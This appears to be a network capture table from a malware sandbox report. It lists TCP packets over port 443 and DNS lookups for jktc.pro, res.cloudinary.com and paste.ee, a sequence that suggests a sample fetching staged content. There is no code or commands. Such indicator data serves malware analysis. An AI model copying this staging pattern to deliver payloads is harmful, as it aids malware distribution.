                                                                        Dec 12, 2024 21:38:55.620558023 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.620583057 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.620594025 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.620611906 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:55.620615959 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.620635986 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.620660067 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:55.620681047 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:55.620697975 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:55.631366014 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.631380081 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.631412029 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.631422043 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.631468058 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:55.631490946 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.631509066 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:55.631546974 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:55.642218113 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.642242908 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.642307997 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.642322063 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:55.642340899 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.642360926 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:55.642432928 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:55.652992964 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.653064013 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.653067112 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:55.653094053 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.653111935 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:55.663770914 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.663836956 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:55.663850069 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.663880110 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.663996935 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:55.674702883 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.674781084 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:55.674793959 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.674829960 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.674854994 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:55.687230110 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.687297106 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:55.687335968 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.687362909 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.687392950 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:55.801610947 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.801640987 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.801757097 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:55.801778078 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.801819086 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:55.813339949 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.813349009 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.813380957 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.813389063 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.813391924 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.813410997 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.813422918 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:55.813422918 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:55.813435078 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.813450098 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:55.824218988 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.824229002 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.824249029 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.824256897 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.824270964 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:55.824284077 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.824299097 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:55.824306965 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:55.833216906 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.833245993 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.833254099 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.833265066 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.833313942 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:55.833331108 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.833360910 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:55.833437920 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:55.845808983 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.845818996 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.845841885 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.845904112 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:55.845917940 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.845940113 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:55.856466055 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.856492996 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.856563091 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:55.856575012 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.856601954 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:55.867408991 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.867432117 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.867441893 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.867507935 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:55.867520094 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.867551088 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:55.878154039 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.878180981 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.878216028 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.878245115 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:55.878257036 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.878323078 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:55.878355980 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:55.996830940 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.996859074 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.996918917 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:55.996948004 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:55.996963024 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:55.996990919 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.014748096 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.014777899 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.014911890 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.014911890 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.014951944 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.027318954 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.027342081 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.027410984 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.027415991 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.027442932 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.027473927 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.039921999 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.039949894 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.040036917 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.040055990 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.040102959 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.050544024 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.050568104 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.050602913 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.050614119 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.050623894 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.050682068 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.062994957 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.063019991 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.063046932 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.063054085 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.063066006 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.063111067 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.077312946 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.077338934 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.077368975 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.077375889 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.077385902 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.077414989 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.090693951 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.090734005 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.090758085 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.090769053 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.090784073 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.090833902 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.188150883 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.188189983 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.188365936 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.188400030 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.188507080 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.200565100 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.200589895 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.200691938 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.200720072 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.200736046 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.216629028 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.216660976 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.216730118 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.216757059 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.216773033 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.216787100 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.227744102 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.227766991 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.227878094 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.227896929 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.227957010 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.235233068 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.235296011 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.235404968 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.235423088 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.235517025 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.247595072 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.247626066 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.247710943 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.247723103 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.247754097 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.260299921 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.260329008 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.260365963 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.260381937 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.260396004 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.260445118 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.271523952 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.271552086 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.271615982 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.271651983 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.271672964 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.376204967 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.376267910 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.376393080 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.376424074 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.376440048 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.395993948 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.396012068 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.396033049 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.396043062 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.396162987 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.396210909 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.396234035 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.408181906 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.408200979 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.408235073 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.408258915 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.408267975 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.408279896 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.408293962 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.408315897 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.408337116 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.408337116 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.408337116 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.408376932 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.416429043 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.416440010 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.416470051 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.416502953 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.416522980 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.416538000 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.416562080 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.423722982 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.423754930 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.423789978 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.423813105 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.423825979 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.423850060 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.429517984 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.429555893 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.429606915 CET44349172151.101.65.137192.168.2.22
                                                                        Dec 12, 2024 21:38:56.429603100 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.429603100 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.429662943 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.429662943 CET49172443192.168.2.22151.101.65.137
                                                                        Dec 12, 2024 21:38:56.430411100 CET49172443192.168.2.22151.101.65.137
                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Dec 12, 2024 21:38:10.891001940 CET5456253192.168.2.228.8.8.8
                                                                        Dec 12, 2024 21:38:11.251447916 CET53545628.8.8.8192.168.2.22
                                                                        Dec 12, 2024 21:38:15.177304029 CET5291753192.168.2.228.8.8.8
                                                                        Dec 12, 2024 21:38:15.542759895 CET53529178.8.8.8192.168.2.22
                                                                        Dec 12, 2024 21:38:15.543663979 CET5291753192.168.2.228.8.8.8
                                                                        Dec 12, 2024 21:38:16.123238087 CET53529178.8.8.8192.168.2.22
                                                                        Dec 12, 2024 21:38:16.123596907 CET5291753192.168.2.228.8.8.8
                                                                        Dec 12, 2024 21:38:16.258913040 CET53529178.8.8.8192.168.2.22
                                                                        Dec 12, 2024 21:38:33.278492928 CET6275153192.168.2.228.8.8.8
                                                                        Dec 12, 2024 21:38:33.528435946 CET53627518.8.8.8192.168.2.22
                                                                        Dec 12, 2024 21:38:33.535042048 CET5789353192.168.2.228.8.8.8
                                                                        Dec 12, 2024 21:38:33.681866884 CET53578938.8.8.8192.168.2.22
                                                                        Dec 12, 2024 21:38:35.698873997 CET5482153192.168.2.228.8.8.8
                                                                        Dec 12, 2024 21:38:35.832986116 CET53548218.8.8.8192.168.2.22
                                                                        Dec 12, 2024 21:38:35.848746061 CET5482153192.168.2.228.8.8.8
                                                                        Dec 12, 2024 21:38:35.983839989 CET53548218.8.8.8192.168.2.22
                                                                        Dec 12, 2024 21:38:35.991416931 CET5482153192.168.2.228.8.8.8
                                                                        Dec 12, 2024 21:38:36.349375963 CET53548218.8.8.8192.168.2.22
                                                                        Dec 12, 2024 21:38:36.349853992 CET5482153192.168.2.228.8.8.8
                                                                        Dec 12, 2024 21:38:36.483887911 CET53548218.8.8.8192.168.2.22
                                                                        Dec 12, 2024 21:38:36.511073112 CET5482153192.168.2.228.8.8.8
                                                                        Dec 12, 2024 21:38:36.645009041 CET53548218.8.8.8192.168.2.22
                                                                        Dec 12, 2024 21:38:50.563513994 CET5471953192.168.2.228.8.8.8
                                                                        Dec 12, 2024 21:38:50.782927036 CET53547198.8.8.8192.168.2.22
                                                                        Dec 12, 2024 21:38:50.805273056 CET4988153192.168.2.228.8.8.8
                                                                        Dec 12, 2024 21:38:54.543517113 CET5499853192.168.2.228.8.8.8
                                                                        Dec 12, 2024 21:38:54.786691904 CET53549988.8.8.8192.168.2.22
                                                                        Dec 12, 2024 21:38:54.786983013 CET5499853192.168.2.228.8.8.8
                                                                        Dec 12, 2024 21:38:54.921896935 CET53549988.8.8.8192.168.2.22
                                                                        Dec 12, 2024 21:38:54.922125101 CET5499853192.168.2.228.8.8.8
                                                                        Dec 12, 2024 21:38:55.071162939 CET53549988.8.8.8192.168.2.22
                                                                        Dec 12, 2024 21:38:55.071373940 CET5499853192.168.2.228.8.8.8
                                                                        Dec 12, 2024 21:38:55.205213070 CET53549988.8.8.8192.168.2.22
                                                                        Dec 12, 2024 21:38:55.206991911 CET5499853192.168.2.228.8.8.8
                                                                        Dec 12, 2024 21:38:55.341855049 CET53549988.8.8.8192.168.2.22
                                                                        Dec 12, 2024 21:39:09.199515104 CET5278153192.168.2.228.8.8.8
                                                                        Dec 12, 2024 21:39:09.333549023 CET53527818.8.8.8192.168.2.22
                                                                        Dec 12, 2024 21:39:09.333825111 CET5278153192.168.2.228.8.8.8
                                                                        Dec 12, 2024 21:39:09.467956066 CET53527818.8.8.8192.168.2.22
                                                                        Dec 12, 2024 21:39:09.468147993 CET5278153192.168.2.228.8.8.8
                                                                        Dec 12, 2024 21:39:09.710434914 CET53527818.8.8.8192.168.2.22
                                                                        Dec 12, 2024 21:39:09.710659981 CET5278153192.168.2.228.8.8.8
                                                                        Dec 12, 2024 21:39:09.833559036 CET53527818.8.8.8192.168.2.22
                                                                        Dec 12, 2024 21:39:09.833842993 CET5278153192.168.2.228.8.8.8
                                                                        Dec 12, 2024 21:39:09.967777014 CET53527818.8.8.8192.168.2.22
                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Dec 12, 2024 21:38:10.891001940 CET192.168.2.228.8.8.80xacdeStandard query (0)jktc.proA (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:15.177304029 CET192.168.2.228.8.8.80xf23fStandard query (0)jktc.proA (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:15.543663979 CET192.168.2.228.8.8.80xf23fStandard query (0)jktc.proA (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:16.123596907 CET192.168.2.228.8.8.80xf23fStandard query (0)jktc.proA (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:33.278492928 CET192.168.2.228.8.8.80x6fc4Standard query (0)res.cloudinary.comA (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:33.535042048 CET192.168.2.228.8.8.80x935fStandard query (0)res.cloudinary.comA (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:35.698873997 CET192.168.2.228.8.8.80x461Standard query (0)jktc.proA (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:35.848746061 CET192.168.2.228.8.8.80x461Standard query (0)jktc.proA (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:35.991416931 CET192.168.2.228.8.8.80x461Standard query (0)jktc.proA (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:36.349853992 CET192.168.2.228.8.8.80x461Standard query (0)jktc.proA (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:36.511073112 CET192.168.2.228.8.8.80x461Standard query (0)jktc.proA (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:50.563513994 CET192.168.2.228.8.8.80xb416Standard query (0)res.cloudinary.comA (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:50.805273056 CET192.168.2.228.8.8.80xe594Standard query (0)res.cloudinary.comA (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:54.543517113 CET192.168.2.228.8.8.80x1c3bStandard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:54.786983013 CET192.168.2.228.8.8.80x1c3bStandard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:54.922125101 CET192.168.2.228.8.8.80x1c3bStandard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:55.071373940 CET192.168.2.228.8.8.80x1c3bStandard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:55.206991911 CET192.168.2.228.8.8.80x1c3bStandard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:39:09.199515104 CET192.168.2.228.8.8.80xee79Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:39:09.333825111 CET192.168.2.228.8.8.80xee79Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:39:09.468147993 CET192.168.2.228.8.8.80xee79Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:39:09.710659981 CET192.168.2.228.8.8.80xee79Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:39:09.833842993 CET192.168.2.228.8.8.80xee79Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Dec 12, 2024 21:38:11.251447916 CET8.8.8.8192.168.2.220xacdeNo error (0)jktc.pro104.21.34.183A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:11.251447916 CET8.8.8.8192.168.2.220xacdeNo error (0)jktc.pro172.67.163.184A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:15.542759895 CET8.8.8.8192.168.2.220xf23fNo error (0)jktc.pro172.67.163.184A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:15.542759895 CET8.8.8.8192.168.2.220xf23fNo error (0)jktc.pro104.21.34.183A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:16.123238087 CET8.8.8.8192.168.2.220xf23fNo error (0)jktc.pro104.21.34.183A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:16.123238087 CET8.8.8.8192.168.2.220xf23fNo error (0)jktc.pro172.67.163.184A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:16.258913040 CET8.8.8.8192.168.2.220xf23fNo error (0)jktc.pro104.21.34.183A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:16.258913040 CET8.8.8.8192.168.2.220xf23fNo error (0)jktc.pro172.67.163.184A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:33.528435946 CET8.8.8.8192.168.2.220x6fc4No error (0)res.cloudinary.comcloudinary.map.fastly.netCNAME (Canonical name)IN (0x0001)false
